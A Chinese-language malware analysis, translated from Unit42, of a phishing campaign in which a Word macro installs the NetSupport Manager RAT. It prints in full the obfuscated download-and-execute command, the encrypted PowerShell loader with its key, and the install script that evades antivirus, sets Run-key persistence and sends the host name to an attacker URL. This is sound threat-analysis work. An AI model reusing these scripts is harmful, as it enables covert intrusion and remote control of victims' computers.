摘要:HTTP/1.1 200 OK Server: NetSupport Gateway/1.6 (Windows NT) Content-Type: application/x-www-form-urlencoded Content-Length: 60 Connection: Keep-Alive CMD=ENCD ES=1 DATA=.g+$.{.. \。$randf=( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | % {[char]$_}) ) $fpath ="$env:appdata\$randf" mkdir $fpath $clientname="presentationhost.exe" $Source = $file1 $Destination = "$fpath\"+"$clientname" react -source $source -destination $destination $Source = $file2 $Destination = "$fpath\client32.ini" write-host $destination react -source $source -destination $destination $Source = $file3 $Destination = "$fpath\HTCTL32.DLL" react -source $source -destination $destination $Source = $file4 $Destination = "$fpath\msvcr100.dll" react -source $source -destination $destination $Source = $file5 $Destination = "$fpath\nskbfltr.inf" react -source $source -destination $destination $Source = $file6 $Destination = "$fpath\NSM.ini" react -source $source -destination $destination $Source = $file7 $Destination = "$fpath\NSM.lic" react -source $source -destination $destination $Source = $file8 $Destination = "$fpath\pcicapi.dll" react -source $source -destination $destination $Source = $file9 $Destination = "$fpath\PCICHEK.DLL" react -source $source -destination $destination $Source = $file10 $Destination = "$fpath\PCICL32.DLL" react -source $source -destination $destination $Source = $file11 $Destination = "$fpath\remcmdstub.exe" react -source $source -destination $destination $Source = $file12 $Destination = "$fpath\TCCTL32.DLL" react -source $source -destination $destination reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v ServiceDLL /t REG_SZ /d "$fpath\$clientname" /f start-process "$fpath\$clientname" #Start-sleep -s 10 Invoke-WebRequest -Uri "http://afsasdfa33[.]xyz/iplog/lepo.php。

2020年1月安全人員發現了一個僞造爲受密碼保護的惡意Microsoft Word文檔,該文檔在網絡釣魚活動中用於傳播商業化遠程訪問工具( NetSupport Manager ),此RAT通常用於管理員遠程訪問客戶端計算機。但是攻擊者將此RAT安裝到受害者的系統上,從而獲得訪問權限。攻擊活動中使用多種技術來規避動態和靜態分析,並利用PowerShell PowerSploit來執行惡意文件安裝。至少從2018年起NetSupport Manager RAT就已經出現在網絡釣魚活動中。

傳播方式

2020年1月上旬檢測到一個執行批處理文件的可疑winword.exe進程。 在圖1中可以看到多個檢測點,從啓動Microsoft Word開始,再到創建和執行.bat文件。 在圖2中可以看到“時間軸”,其中顯示了檢測警報,行爲流程和連接嘗試。 圖3顯示了基於這些行爲指標檢測到的初始警報。

下面圖4是惡意文檔截圖,僞裝成受密碼保護的NortonLifelock文檔,該文檔請求用戶輸入密碼以啓用宏。用於此分析的文 

SHA256:e9440a5d2de2453ae5b69a9c096f8d4cf9e059469c5de67380d76e02dd6975

對用戶來說,文檔似乎包含需要密碼才能查看的個人信息。打開文檔並單擊“啓用內容”後,將執行宏並向用戶顯示密碼對話框。

密碼很有可能被攻擊者寫在釣魚郵件正文中,它只接受字母“c”或“C”,如下面的宏代碼所示。此宏代碼的哈希

SHA256:68ca2458e0db9739258ce9e22aadd2423002b2cc779033d78d6abec1db534ac2

如果用戶輸入了不正確的密碼,則會顯示一條錯誤消息,然後顯示“完成”處理消息。在輸入正確的密鑰之前,不會進行惡意活動,輸入正確的密碼後,宏將繼續執行代碼並生成以下命令字符串:

cmD /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et 
/p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i" 
>>%temp%\alpaca.bat&EcHo|s^et /p=" 
http^:^/^/^quickwaysignstx[.]com/view.php 
">>%temp%\alpaca.bat&EcHo|s^et /p=" ^/q 
&exit">>%temp%\alpaca.bat&%temp%\alpaca.bat&avvfge 2

宏使用visualbasicforapplications(VBA)窗體上的多個標籤對字符串進行模糊處理,字符最終連接在一起以構造最終命令,在受害者機器中下載並執行RAT。

命令字符串通過VBA shell函數執行,該函數執行以下操作:

 1、通過/c參數啓動cmd.exe,執行命令並退出
 2、在受害者%temp%目錄中構造名爲alpaca.bat的批處理文件
 3、執行新創建的批處理腳本

批處理腳本使用msiexec,它是Windows安裝程序服務的一部分,用於下載二進制文件並安裝:

 quickwaysignstx[.]com/view.php

如果請求中用戶代理字符串是Windows Installer,則返回MSI文件。MSI負載(SHA256:41d27d53c5d41003bc9913476a3afd3961b561b1201bee8bfde327a5f0d22a040a)是來自 www.exemsi [.]com的未註冊版本生成的,標題爲MPZMZQYVXO patch version 5.1。此版本字符串是隨機的,運行MSI時將顯示字符串。下載後,MSI將使用/q參數執行。MSI在受害者的%temp%目錄安裝PowerShell腳本REgistryMPZMZQYVXO.ps1。 

function HYTNKJSDEH([String] $YTVRJKIEIR, [String] $BORBFDSYOP)
{
$DHPFYCOKLM = “<<strong>base64 encoded + encrypted payload</strong>>”;
$encoding = New-Object System.Text.ASCIIEncoding;
$KULVWNXDPId = $encoding.GetBytes("DJZGVUGVHDMNIGZD");
$derivedPass = New-Object 
System.Security.Cryptography.PasswordDeriveBytes($YTVRJKIEIR, 
$encoding.GetBytes($BORBFDSYOP), "SHA1", 2);
[Byte[]] $ESFLDIMUEO = $derivedPass.GetBytes(16);
$LCZJFEXHXR = New-Object 
System.Security.Cryptography.TripleDESCryptoServiceProvider;

$LCZJFEXHXR.Mode = 
[System.Security.Cryptography.CipherMode]::CBC;
$JOVGMJCIKY = $LCZJFEXHXR.CreateDecryptor($ESFLDIMUEO, $KULVWNXDPId);
$LBUWDFHHMZ = New-Object System.IO.MemoryStream($DHPFYCOKLMa, 
$True);
$ZSKXKODPKK = New-Object 
System.Security.Cryptography.CryptoStream($LBUWDFHHMZ, 
$JOVGMJCIKY, 
[System.Security.Cryptography.CryptoStreamMode]::Read);
$STDVLFIUQN = $ZSKXKODPKK.Read($JHTZWEZBUW, 0, 
$JHTZWEZBUW.Length);
$LBUWDFHHMZ.Close();
$ZSKXKODPKK.Close();
$LCZJFEXHXR.Clear();
if (($JHTZWEZBUW.Length -gt 3) -and ($JHTZWEZBUW[0] -eq 0xEF) 
-and ($JHTZWEZBUW[1] -eq 0xBB) -and ($JHTZWEZBUW[2] -eq 0xBF)) { 
$h = $JHTZWEZBUW[3..($JHTZWEZBUW.Length-1)]; }
return $encoding.GetString($JHTZWEZBUW).TrimEnd([Char] 0);
}
 $TYCNJNUWWG = HYTNKJSDEH "ew9p5rzlmvcf32b6i0oun8q47tag1xhs" 
"7ohp9z481qem6ykbdu2argt5lj3fcsi0";
Invoke-Expression $TYCNJNUWWG;

存儲在REgistryMPZMZQYVXO.ps1中的加密數據blob是另一個PowerShell腳本,負責將NetSupport Manager RAT安裝到受害者上。

PowerShell腳本是使用powerspoit框架中的開源腳本Out-EncryptedScript.ps1生成的。它包含base64數據處理模塊,並使用CBC的密碼模式進行TripleDES 。

此示例的解密密碼和初始化向量(IV)爲:

 Decryption key = 0xA7A15B277A74CD3233B9DF078ABCDE12 
 IV                        = DJZGVUGVHDMNIGZD 

$scriptPath = split-path -parent 
$MyInvocation.MyCommand.Definition
if ($scriptpath -match "avast") {exit}
if ($scriptpath -match "Avast") {exit}
if ($scriptpath -match "AVG") {exit}
if ($scriptpath -match "avg") {exit}
function react (
  $source,
  $destination
)
{
Convert-StringToBinary -InputString $source -FilePath $Destination;
  #      }
     }#}
function Convert-StringToBinary
(
 $InputString
,  $FilePath
)
{
$file= $InputString
$data = [System.Convert]::FromBase64String($file)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null

$cs = New-Object System.IO.Compression.GZipStream($ms, 
[System.IO.Compression.CompressionMode]::Decompress)
$sr = New-Object System.IO.StreamReader($cs)
$t = $sr.readtoend()#|out-file str.txt

$ByteArray = [System.Convert]::FromBase64String($t);
[System.IO.File]::WriteAllBytes($FilePath, $ByteArray);
}
function Install
{
$file1 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file2 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file3 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file4 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file5 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file6 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file7 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file8 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file9 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file10 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file11 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;
$file12 = “<<strong>Gzip compressed + base64 encoded file</strong>>”;

$randf=( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | 
Get-Random -Count 8 | % {[char]$_}) )
$fpath ="$env:appdata\$randf"
mkdir $fpath
$clientname="presentationhost.exe"
$Source = $file1
$Destination = "$fpath\"+"$clientname"
react -source $source -destination $destination
$Source = $file2
$Destination = "$fpath\client32.ini"
write-host $destination
react -source $source -destination $destination
$Source = $file3
$Destination = "$fpath\HTCTL32.DLL"
react -source $source -destination $destination
$Source = $file4
$Destination = "$fpath\msvcr100.dll"
react -source $source -destination $destination
$Source = $file5
$Destination = "$fpath\nskbfltr.inf"
react -source $source -destination $destination
$Source = $file6
$Destination = "$fpath\NSM.ini"
react -source $source -destination $destination
$Source = $file7
$Destination = "$fpath\NSM.lic"
react -source $source -destination $destination
$Source = $file8
$Destination = "$fpath\pcicapi.dll"
react -source $source -destination $destination
$Source = $file9
$Destination = "$fpath\PCICHEK.DLL"
react -source $source -destination $destination
$Source = $file10
$Destination = "$fpath\PCICL32.DLL"
react -source $source -destination $destination
$Source = $file11
$Destination = "$fpath\remcmdstub.exe"
react -source $source -destination $destination
$Source = $file12
$Destination = "$fpath\TCCTL32.DLL"
react -source $source -destination $destination
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v ServiceDLL /t REG_SZ /d "$fpath\$clientname" /f
start-process "$fpath\$clientname"
#Start-sleep -s 10
Invoke-WebRequest -Uri "http://afsasdfa33[.]xyz/iplog/lepo.php?hst=$env:computername"
$f=get-content $env:temp\insghha4.txt

remove-item $env:TEMP\*.ps1
#cmd /c del %temp%\*.ps1 /f
#cmd /c del %temp%\*.txt /f
remove-item $f
}
#ShowConsole
#rights

install;

RAT安裝腳本會進行以下操作:

1、如果目標上正在運行Avast或AVG防病毒軟件,則停止安裝

2、將組成NetSupport Manager RAT的12個文件安裝到受害者%appdata%中的隨機目錄(長度爲8),例如c:users\username%AppdataRoaming\%randomvalue%

3、在受害者上創建以下注冊表項:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Name: ServiceDLL

Value: C:\Users\%username% \AppData\Roaming\%randomvalue%\presentationhost.exe’

4、執行主NetSupport Manager RAT presentationhost.exe

5、休眠10秒

6、將受害者的計算機名發送到 http://afsasdfa33 [.]xyz/iplog/lepo.php?hst=%computername%

7、從站點afsasdfa33.]xyz返回的任何數據都保存在%temp%目錄中的insghha4.txt

8、從受害者的%temp%目錄中刪除所有擴展名爲.ps1的文件

9、刪除名爲insghha4.txt的文件

NetSupport Manager(presentationhost.exe)啓動後將向域geo.netsupportsoftware[.]com查詢主機的地理位置,NetSupport Manager的原始名稱是client32.exe,更改爲presentationhost.exe以避免受害者懷疑。流量示例如下:

POST http://94.158.245 [.]182/fakeurl.htm HTTP/1.1

User-Agent: NetSupport Manager/1.3

Content-Type: application/x-www-form-urlencoded

Content-Length: 22

Host: 94.158.245[.]182

Connection: Keep-Alive

CMD=POLL

INFO=1

ACK=1

響應:

 HTTP/1.1 200 OK 
 Server: NetSupport Gateway/1.6 (Windows NT) 
 Content-Type: application/x-www-form-urlencoded 
 Content-Length: 60 
 Connection: Keep-Alive 
 CMD=ENCD 
 ES=1 
 DATA=.g+$.{.. \….W…bb…).w}..o..X..xf…

受害目標發送的加密數據:

POST http://94.158.245 [.]182/fakeurl.htm HTTP/1.1

User-Agent: NetSupport Manager/1.3

Content-Type: application/x-www-form-urlencoded

Content-Length: 244

Host: 94.158.245[.]182

Connection: Keep-Alive

CMD=ENCD

ES=1

DATA=u.2h.r..4.]..%y-…..=I…D3.W..i.7?….=@….F.f….&t.[..6ra..L..Tzg..... ..U.z4.]..%y-A9H=n .:!.”Pfd]U,[.(...f=I.....W.p..RHz.....#..@.....>|.?...R...s.nt.G..=}\[email protected][email protected]……..M.6..

總結

攻擊活動是從2019年11月初到2020年1月底。整個11月上半月,所有相關活動都使用的電子郵件附件,其中包含與目標公司有公開聯繫的個人或公衆人物。所有電子郵件使用隨機的protonmail[.]com電子郵件地址發送,包含與退款狀態或未經授權交易相關的郵件主題。從11月底到2020年1月郵件附件發生了變化,名爲<target company website>.doc,電子郵件主題相同,目前尚不清楚攻擊的目的意圖。

*參考來源: unit42 ,由Kriston編譯,轉載請註明來自FreeBuf.COM

相關文章